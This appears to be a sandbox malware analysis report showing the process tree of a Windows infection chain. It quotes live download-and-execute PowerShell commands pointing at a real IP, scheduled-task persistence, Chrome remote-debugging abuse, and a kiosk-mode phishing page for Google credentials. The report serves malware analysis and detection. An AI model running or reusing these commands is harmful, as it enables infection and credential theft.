1132 wrote to memory of 1812 1132 rapes.exe 40 PID 1132 wrote to memory of 1812 1132 rapes.exe 40 PID 1132 wrote to memory of 1812 1132 rapes.exe 40 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 1812 wrote to memory of 3004 1812 iZ73hNr.exe 42 PID 3004 wrote to memory of 2472 3004 iZ73hNr.exe 44 PID 3004 wrote to memory of 2472 3004 iZ73hNr.exe 44 PID 3004 wrote to memory of 2472 3004 iZ73hNr.exe 44 PID 3004 wrote to memory of 2472 3004 iZ73hNr.exe 44 PID 2480 wrote to memory of 1416 2480 cuFIzyH.exe 45 PID 2480 wrote to memory of 1416 2480 cuFIzyH.exe 45 PID 2480 wrote to memory of 1416 2480 cuFIzyH.exe 45 PID 2480 wrote to memory of 1416 2480 cuFIzyH.exe 45 PID 1132 wrote to memory of 2264 1132 rapes.exe 46 PID 1132 wrote to memory of 2264 1132 rapes.exe 46 PID 1132 wrote to memory of 2264 1132 rapes.exe 46 PID 1132 wrote to memory of 2264 1132 rapes.exe 46 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 PID 2264 wrote to memory of 2616 2264 P2SXMuh.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe"C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2824
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'POFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE"C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 12527⤵
- Loads dropped DLL
- Program crash
PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 10368⤵
- Loads dropped DLL
- Program crash
PID:2472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2616
-
-
-
C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"6⤵
- Executes dropped EXE
PID:2992 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"7⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Loads dropped DLL
PID:2948 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\F8617F1F15E53ADE2CC7B01D00F844AC\BE4CE3E771FFA0AFA6B3CA61DF9F4514.vbe" /f /rl highest8⤵
- Scheduled Task/Job: Scheduled Task
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif"C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf98⤵
- Executes dropped EXE
PID:1092 -
C:\Windows\system32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"9⤵
- Loads dropped DLL
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG10⤵
- Executes dropped EXE
PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
C:\Windows\system32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"9⤵
- Loads dropped DLL
PID:584 -
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG10⤵
- Executes dropped EXE
PID:1120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe"C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2276 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1684
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE"C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:352
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10167650121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "6ycUEmagtJO" /tr "mshta \"C:\Temp\NUnXI0p8x.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2208
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\NUnXI0p8x.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe"C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 12007⤵
- Loads dropped DLL
- Program crash
PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe"C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3044 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1956 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7309758,0x7fef7309768,0x7fef73097788⤵PID:2716
-
-
C:\Windows\system32\ctfmon.exectfmon.exe8⤵PID:2040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:28⤵PID:2304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:88⤵PID:1888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:88⤵PID:2348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2144 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2436 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2444 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:28⤵PID:2124
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3536 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef59e9758,0x7fef59e9768,0x7fef59e97788⤵PID:3548
-
-
C:\Windows\system32\ctfmon.exectfmon.exe8⤵PID:3660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1212 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:28⤵PID:3712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:88⤵PID:3728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:88⤵PID:3796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2308 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1588 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:28⤵PID:3644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3868 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:88⤵PID:3480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe"C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1588 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:884
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2612 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.0.753336387\1122620246" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1036 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af1f3b47-b849-487e-b95a-9c1e79b1e933} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1340 106d2c58 gpu9⤵PID:1896
-
-
